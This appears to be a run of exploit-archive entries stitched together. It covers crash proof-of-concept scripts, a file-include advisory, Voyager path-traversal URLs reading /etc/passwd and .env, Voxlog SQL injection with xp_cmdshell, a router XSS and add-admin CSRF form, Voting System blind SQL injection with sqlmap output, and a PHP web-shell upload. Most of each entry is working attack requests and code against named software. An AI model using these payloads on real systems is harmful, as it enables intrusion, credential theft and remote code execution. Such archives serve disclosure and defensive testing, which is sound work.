# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the search bar and click search
# App will now crash
buffer = "A" * 5800
payload = buffer
try:
f=open("PoC.txt","w")
print "[+] Creating %s evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
Document Title:
===============
vPhoto-Album v4.2 iOS - File Include Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1477
Release Date:
=============
2015-05-05
Vulnerability Laboratory ID (VL-ID):
====================================
1477
Common Vulnerability Scoring System:
====================================
6.2
Product & Service Introduction:
===============================
vPhoto Pro is your side of the most powerful local album management software that allows you to easily manage your massive photos,
while giving you an unprecedented user experience. No in-app purchase, no functional limitations.
(Copy of the Homepage: https://itunes.apple.com/us/app/veryphoto-album-password-wifi/id720810114 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a local file include web vulnerability in the official vPhoto-Album v4.2 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-05-05: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Cheng Chen
Product: vPhoto-Album - iOS Web Application (Wifi) 4.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official vPhoto-Album v4.2 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system
specific path commands to compromise the mobile web-application.
The vulnerability is located in the `name` value of the wifi interface module. Local attackers are able to manipulate the
wifi web interface by usage of the vulnerable sync function. The sync does not encode or parse the context of the albumname.
Local attacker are able to manipulate the input of the folder path value to exploit the issue by web-application sync.
The execution of unauthorized local file or path request occurs in the index file dir listing module of the wifi web-application.
The request method to inject is a sync and the attack vector is located on the application-side of the affected service.
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.1.
Exploitation of the file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation
of the local file include web vulnerability results in mobile application or connected device component compromise.
Vulnerable Method(s):
[+] [Sync]
Vulnerable Module(s):
[+] Albumname
Vulnerable Parameter(s):
[+] name
Affected Module(s):
[+] File Dir Index
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by local attackers with restricted physical device access and no user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: http://localhost:8080/
<script type="text/javascript">
var albumArray = getAllAlbum();
var numberOfAlbums = getNumberOfAlbums();
for (var i=0; i<numberOfAlbums; i=i+4)
{
document.write("<tr>");
document.write("<td height=\"170\" width=\"150\">");
if (i+0 < numberOfAlbums)
{
document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+0]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+0)+"')>");
}
document.write("</td>");
document.write("<td height=\"170\" width=\"50\"></td>");
document.write("<td height=\"170\" width=\"150\">");
if (i+1 < numberOfAlbums)
{
document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+1]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+1)+"')>");
}
document.write("</td>");
document.write("<td height=\"170\" width=\"50\"></td>");
document.write("<td height=\"170\" width=\"150\">");
if (i+2 < numberOfAlbums)
{
document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+2]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+2)+"')>");
}
document.write("</td>");
document.write("<td height=\"170\" width=\"50\"></td>");
document.write("<td height=\"170\" width=\"150\">");
if (i+3 < numberOfAlbums)
{
document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+3]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+3)+"')>");
}
document.write("</td>");
document.write("</tr>");
document.write("<tr>");
document.write("<td height=\"20\" > <p align=\"center\">");
if (i+0 < numberOfAlbums)
{
document.write("<font face=\"Courier New\" size=\"2\">");
document.write(albumArray[i+0].name+"("+albumArray[i+0].numberOfImage+")");
document.write("</font>");
}
document.write("</td>");
document.write("<td height=\"20\" width=\"50\"></td>");
document.write("<td height=\"20\" > <p align=\"center\">");
if (i+1 < numberOfAlbums)
{
document.write("<font face=\"Courier New\" size=\"2\">");
document.write(albumArray[i+1].name+"("+albumArray[i+1].numberOfImage+")");
document.write("</font>");
}
document.write("</td>");
document.write("<td height=\"20\" width=\"50\"></td>");
document.write("<td height=\"20\" > <p align=\"center\">");
if (i+2 < numberOfAlbums)
{
document.write("<font face=\"Courier New\" size=\"2\">");
document.write(albumArray[i+2].name+"("+albumArray[i+2].numberOfImage+")");
document.write("</font>");
}
document.write("</td>");
document.write("<td height=\"20\" width=\"50\"></td>");
document.write("<td height=\"20\" > <p align=\"center\">");
if (i+3 < numberOfAlbums)
{
document.write("<font face=\"Courier New\" size=\"2\">");
document.write(albumArray[i+3].name+"("+albumArray[i+3].numberOfImage+")");
document.write("</font>");
}
document.write("</td>");
document.write("</tr>");
document.write("<tr>");
document.write("<td height=\"20\" colspan=\"7\">"); document.write("</td>");
document.write("</tr>");
}
</script>
<tr><td height="170" width="150"><p align="center"><img src="getCoverImage?%7B%22name%22:%22%5C%22%3E%3C[FILE INCLUDE VULNERABILITY!]%3E%22,%22type%22:%222%22,%22groupType%22:2,%22url%22:%22assets-library://group/?id=B94CC6C9-FB2C-4BFD-8BA4-0925E51146A1&filter=1537%22,%22numberOfImage%22:%222%22%7D" onclick="albumClick('0')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"><p align="center"><img src="getCoverImage?%7B%22name%22:%22Camera%20Roll%22,%22type%22:%222%22,%22groupType%22:16,%22url%22:%22assets-library://group/?id=70169F06-36C7-430C-AA4F-55B95E268426%22,%22numberOfImage%22:%222%22%7D" onclick="albumClick('1')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"></td><td height="170" width="50"></td><td height="170" width="150"></td></tr><tr><td height="20"> <p align="center"><font face="Courier New" size="2">"><C[FILE INCLUDE VULNERABILITY!]>(2)</font></td><td height="20" width="50"></td><td height="20" > <p align="center"><font face="Courier New" size="2">Camera Roll(2)</font></td><td height="20" width="50"></td><td height="20" > <p align="center"></td><td height="20" width="50"></td><td height="20" > <p align="center"></td></tr><tr><td height="20" colspan="7"></td></tr>
</table>
</div>
</body>
</html></iframe></font></p></td></tr></tbody>
Reference(s):
http://localhost:8080/
Security Risk:
==============
The security riskof the local file include web vulnerability in the album values is estimated as high. (CVSS 6.2)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Katharin S. L. (CH) (research@vulnerability-lab.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
# Exploit Title: Voyager 1.3.0 - Directory Traversal
# Google Dork: N/A
# Date: January 2020-01-06
# Exploit Author: NgoAnhDuc
# Vendor Homepage: https://voyager.devdojo.com/
# Software Link:https://github.com/the-control-group/voyager/releases/tag/v1.3.0https://github.com/the-control-group/voyager/releases/tag/v1.2.7
# Version: 1.3.0 and bellow
# Tested on: Ubuntu 18.04
# CVE : N/A
Vulnerable code is in voyager/src/Http/Controllers/VoyagerController.php
========================================
public function assets(Request $request)
{
*$path = str_start(str_replace(['../', './'], '',
urldecode($request->path)), '/');*
* $path = base_path('vendor/tcg/voyager/publishable/assets'.$path);*
if (File::exists($path)) {
$mime = '';
if (ends_with($path, '.js')) {
$mime = 'text/javascript';
} elseif (ends_with($path, '.css')) {
$mime = 'text/css';
} else {
$mime = File::mimeType($path);
}
$response = response(File::get($path), 200,
['Content-Type' => $mime]);
$response->setSharedMaxAge(31536000);
$response->setMaxAge(31536000);
$response->setExpires(new \DateTime('+1 year'));
return $response;
}
return response('', 404);
}
========================================
PoC:
passwd:
http://localhost/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2Fetc/passwd
Laravel environment
file:http://localhost/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F<web
root dir>/.env
source: https://www.securityfocus.com/bid/52081/info
VOXTRONIC Voxlog Professional is prone to a file-disclosure vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
An remote attacker can exploit these issues to obtain potentially sensitive information from local files on computers running the vulnerable application, or modify the logic of SQL queries. A successful exploit may allow the attacker to compromise the software, retrieve information, or modify data; These may aid in further attacks.
VOXTRONIC Voxlog Professional 3.7.2.729 and 3.7.0.633 are vulnerable; other versions may also be affected.
http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);waitfor delay '0:0:5' --+
http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);exec master..xp_cmdshell 'xxxxx' --+
source: https://www.securityfocus.com/bid/52081/info
VOXTRONIC Voxlog Professional is prone to a file-disclosure vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
An remote attacker can exploit these issues to obtain potentially sensitive information from local files on computers running the vulnerable application, or modify the logic of SQL queries. A successful exploit may allow the attacker to compromise the software, retrieve information, or modify data; These may aid in further attacks.
VOXTRONIC Voxlog Professional 3.7.2.729 and 3.7.0.633 are vulnerable; other versions may also be affected.
http://www.example.com/voxlog/GET.PHP?v=ZmlsZT1DOi9ib290LmluaQ==
# Title: Vox TG790 ADSL Router - Cross-Site Scripting
# Author: Cakes
# Exploit Date: 2018-08-01
# Vendor: Vox Telecom
# Link: https://www.vox.co.za/
# Firmware Version: 6.2.W.1
# CVE: N/A
# Description
# Due to improper user iunput management low privilege users are able to create
# a persistent Cross-Site scripting attack via the phone book function.
# PoC
POST /cgi/b/_voip_/phonebook/?be=0&l0=2&l1=1&name= HTTP/1.1
Host: 192.168.1.254
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://192.168.1.254/cgi/b/_voip_/pb/?be=0&l0=2&l1=1&name=
Authorization: Digest username="cakes", realm="SpeedTouch", nonce="0745EHNLF:00-1D-68-52-6C-37:173934:292999", uri="/cgi/b/_voip_/phonebook/?be=0&l0=2&l1=1&name=", response="ab09b54d4b6369496463eb79cfb4b1c2", qop=auth, nc=0000002a, cnonce="8305e26a71dd0ae2"
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 141
0=10&1=&100=Cakes&101=Cakes&102=123123&103=123123123&104=123123&105=123123&106=<script>altert("TESTER");</script>
# Response
HTTP/1.0 200 OK
Cache-Control: no-cache
Expires: -1
Content-Type: text/html
# Title: Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)
# Author: Cakes
# Exploit Date: 2018-08-01
# Vendor: Vox Telecom
# Link: https://www.vox.co.za/
# Firmware Version: 6.2.W.1
# CVE: N/A
# Description
# Due to improper session management low privilege users are able to create
# administrator accounts through a crafted POST request.
# PoC
<html>
<form action="https://TARGET/cgi/b/users/cfg/usraccedit/?be=0&l0=2&l1=9&tid=ADD_USER" method="POST">
<input type="hidden" name="0" id="0" value="10">
<input type="hidden" name="1" id="1" value="usrAccApply">
<input type="hidden" name="34" id="34" value="LulzCakes">
<input type="hidden" name="36" id="36" value="1">
<input type="text" name="33" id="33" placeholder="Account Name">
<br />
<input type="text" name="31" id="31" value="Administrator">
<br />
<input type="submit" value="W00ts">
</form>
</html>
# Exploit Title: VOX Music Player 2.8.8 '.pls' Local Crash PoC
# Date: 10-12-2016
# Exploit Author: Antonio Z.
# Vendor Homepage: http://coppertino.com/vox/mac/
# Software Link: http://dl.devmate.com/com.coppertino.Vox/Vox.dmg
# Version: 2.8.8
# Tested on: OS X 10.10, OS X 10.11, OS X 10.12
import os
evil = '\x90'
pls = '[playlist]\n' + 'NumberOfEntries=1\n' +'File1' + evil + '\n' + 'Title1=\n' + 'Length1=-1\n'
file = open('Local_Crash_PoC.pls', 'wb')
file.write(pls)
file.close()
# Exploit Title: Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection)
# Date: 02/05/2021
# Exploit Author: Syed Sheeraz Ali
# Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows 10 20H2 + XAMPP v3.2.4
If we try to login as a voter and catch the login request in burp then pass it to sql map then we can put our payload in voter parameter
Vulnerable code
```
Path :- /votersystem/login.php
<?php
session_start();
include 'includes/conn.php';
if(isset($_POST['login'])){
$voter = $_POST['voter']; <- vulnerable parameter
$password = $_POST['password'];
$sql = "SELECT * FROM voters WHERE voters_id = '$voter'"; <-
Passed unsanitized input
$query = $conn->query($sql);
if($query->num_rows < 1){
$_SESSION['error'] = 'Cannot find voter with the ID';
}
else{
$row = $query->fetch_assoc();
if(password_verify($password, $row['password'])){
$_SESSION['voter'] = $row['id'];
}
else{
$_SESSION['error'] = 'Incorrect password';
}
}
}
else{
$_SESSION['error'] = 'Input voter credentials first';
}
header('location: index.php');
?>
```
Request
```
POST /login.php HTTP/1.1
Host: 10.129.139.200
Content-Length: 27
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.129.139.200
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Referer: http://10.129.139.200/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=vuukl0gemht1iiq7lmptu7npoe
Connection: close
voter=as&password=as&login=
```
Sqlmap output
```
python3 sqlmap.py --dbms=mysql --batch --level=1 --risk=3 -r /Users/sheerazali/Documents/wpcve/voter.req -p voter
___
__H__
___ ___[)]_____ ___ ___ {1.5.4.7#dev}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program
[*] starting @ 07:50:56 /2021-05-02/
[07:50:56] [INFO] parsing HTTP request from
'/Users/sheerazali/Documents/wpcve/voter.req'
[07:50:57] [INFO] testing connection to the target URL
got a 302 redirect to 'http://10.129.139.200:80/index.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: voter (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: voter=as' AND (SELECT 2487 FROM (SELECT(SLEEP(5)))WYpt) AND 'hBVQ'='hBVQ&password=as&login=
---
[07:50:57] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[07:51:08] [INFO] confirming MySQL
[07:51:08] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[07:51:19] [INFO] adjusting time delay to 1 second due to good response times
[07:51:19] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.27, Apache 2.4.46
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[07:51:19] [INFO] fetched data logged to text files under '/Users/sheerazali/.local/share/sqlmap/output/10.129.139.200'
[*] ending @ 07:51:19 /2021-05-02/
```
# Exploit Title: Voting System 1.0 - Remote Code Execution (Unauthenticated)
# Date: 07/05/2021
# Exploit Author: secure77
# Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Linux Debian 5.10.28-1kali1 (2021-04-12) x86_64 // PHP Version 7.4.15 & Built-in HTTP server // mysql Ver 15.1 Distrib 10.5.9-MariaDB
Unauthenticated file upload is possible via /admin/candidates_add.php that can use for RCE.
Your upload will be stored at /images/ and is also accessible without authentication.
########################### Vulnerable code ############################
<?php
include 'includes/session.php';
if(isset($_POST['add'])){
$firstname = $_POST['firstname'];
$lastname = $_POST['lastname'];
$position = $_POST['position'];
$platform = $_POST['platform'];
$filename = $_FILES['photo']['name'];
if(!empty($filename)){
move_uploaded_file($_FILES['photo']['tmp_name'], '../images/'.$filename);
}
$sql = "INSERT INTO candidates (position_id, firstname, lastname, photo, platform) VALUES ('$position', '$firstname', '$lastname', '$filename', '$platform')";
if($conn->query($sql)){
$_SESSION['success'] = 'Candidate added successfully';
}
else{
$_SESSION['error'] = $conn->error;
}
}
else{
$_SESSION['error'] = 'Fill up add form first';
}
header('location: candidates.php');
?>
########################### Payload ############################
POST /admin/candidates_add.php HTTP/1.1
Host: 192.168.1.1
Content-Length: 275
Cache-Control: max-age=0
Origin: http://192.168.1.1
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrmynB2CmGO6vwFpO
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.1/admin/candidates.php
Accept-Encoding: gzip, deflate
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
------WebKitFormBoundaryrmynB2CmGO6vwFpO
Content-Disposition: form-data; name="photo"; filename="shell.php"
Content-Type: application/octet-stream
<?php echo exec("whoami"); ?>
------WebKitFormBoundaryrmynB2CmGO6vwFpO
Content-Disposition: form-data; name="add"